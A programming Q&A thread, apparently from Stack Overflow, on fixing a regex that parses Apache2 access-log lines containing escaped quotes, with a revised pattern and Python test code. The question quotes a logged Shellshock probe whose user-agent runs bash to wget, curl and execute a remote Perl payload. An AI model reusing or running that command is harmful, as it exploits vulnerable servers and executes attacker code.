Reputation: 138
I want to parse Apache2 log files, and I found an otherwise good regexp here for doing so:
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/
The problem is that this regexp predates the shellshock hack bots, and it fails to match a log line whose user agent string looks like the one below.
Example of a bash attack line that does not match:
199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""
Here is a regular log line:
157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
Can someone provide an updated regexp that handles hacked user agent strings, or suggest an alternative two-step PHP and regexp approach that is more hack-proof? I can see that the specific problem relates to handling \", and it appears the last part of the regexp could be replaced with "(.*)"$, but I'd like an expert opinion. Thanks.
Upvotes: 0
Views: 499
Reputation: 241911
Change both instances of
"([^"]*)"
to
"((?:[^"]|\\")*)"
That will allow \" within quoted strings.
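As a rough check of that substitution, here is a minimal sketch in Python (an assumption on my part; the question mentions PHP, but the constructs used here are written the same way in PCRE and in Python's `re`). The `agent` value is a shortened, made-up string in the style of the attack line from the question, and the names `OLD_FIELD` and `NEW_FIELD` are only for illustration.

```python
import re

# Sub-pattern for one double-quoted field, before and after the change.
OLD_FIELD = r'"([^"]*)"'
NEW_FIELD = r'"((?:[^"]|\\")*)"'

# Hypothetical, shortened user agent field containing backslash-escaped quotes.
agent = r'"() { :;}; /bin/bash -c \"echo hi\""'

# The old pattern cannot consume the whole field, because [^"]* stops
# at the first inner quote and nothing else in it can match a quote.
old = re.fullmatch(OLD_FIELD, agent)

# The new pattern also accepts the two-character sequence \" inside the field.
new = re.fullmatch(NEW_FIELD, agent)

print(old)
print(new.group(1) if new else None)
```

Note that `[^"]` also matches a backslash on its own, so the revised pattern relies on backtracking to pair each backslash with the quote that follows it.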
By the way, it is not necessary to backslash-escape quotes in a regex, nor is it necessary to backslash-escape ] in a character class when it is the first character in the class. So you could remove some redundant backslashes. And personally, I'd use the same quote exclusion syntax instead of a non-greedy match.
Finally, as is observed in a comment, the parse of the request will fail if the request is incomplete. If the only kind of incomplete request you need to handle is the missing-request indicator ("-"), then you could recognize it by making most of the request optional, leaving the - as the "method".
So I'd suggest the following:
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$/
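To try the suggested expression, here is a small sketch in Python (my choice for the example, not something the question asked for; the pattern itself is copied unchanged apart from dropping the `/` delimiters). The first two inputs are the log lines from the question. The third, with `"-"` as the request, is a hypothetical line I made up to exercise the optional part, and `parse_line` is just an illustrative helper name.

```python
import re

# The suggested pattern, split over three string literals for readability.
LOG_LINE = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] '
    r'"(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) '
    r'"((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$'
)

def parse_line(line):
    """Return the 13 captured fields as a tuple, or None if there is no match."""
    m = LOG_LINE.match(line)
    return m.groups() if m else None

shellshock = (
    r'199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] '
    r'"GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" '
    r'"() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;'
    r'curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""'
)
regular = (
    '157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 '
    '"-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"'
)
# Hypothetical line with a missing request, written as "-".
incomplete = '192.0.2.1 - - [18/Jan/2015:10:00:00 -0500] "-" 408 0 "-" "-"'

for line in (shellshock, regular, incomplete):
    fields = parse_line(line)
    # Fields 7 to 9 are method, path and protocol; the last two are None
    # when the request is only "-".
    print(fields[6:9] if fields else "no match")
```

In PHP the same pattern would presumably be passed to `preg_match` with the `/` delimiters restored, but I have only sketched the Python version here.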
Upvotes: 0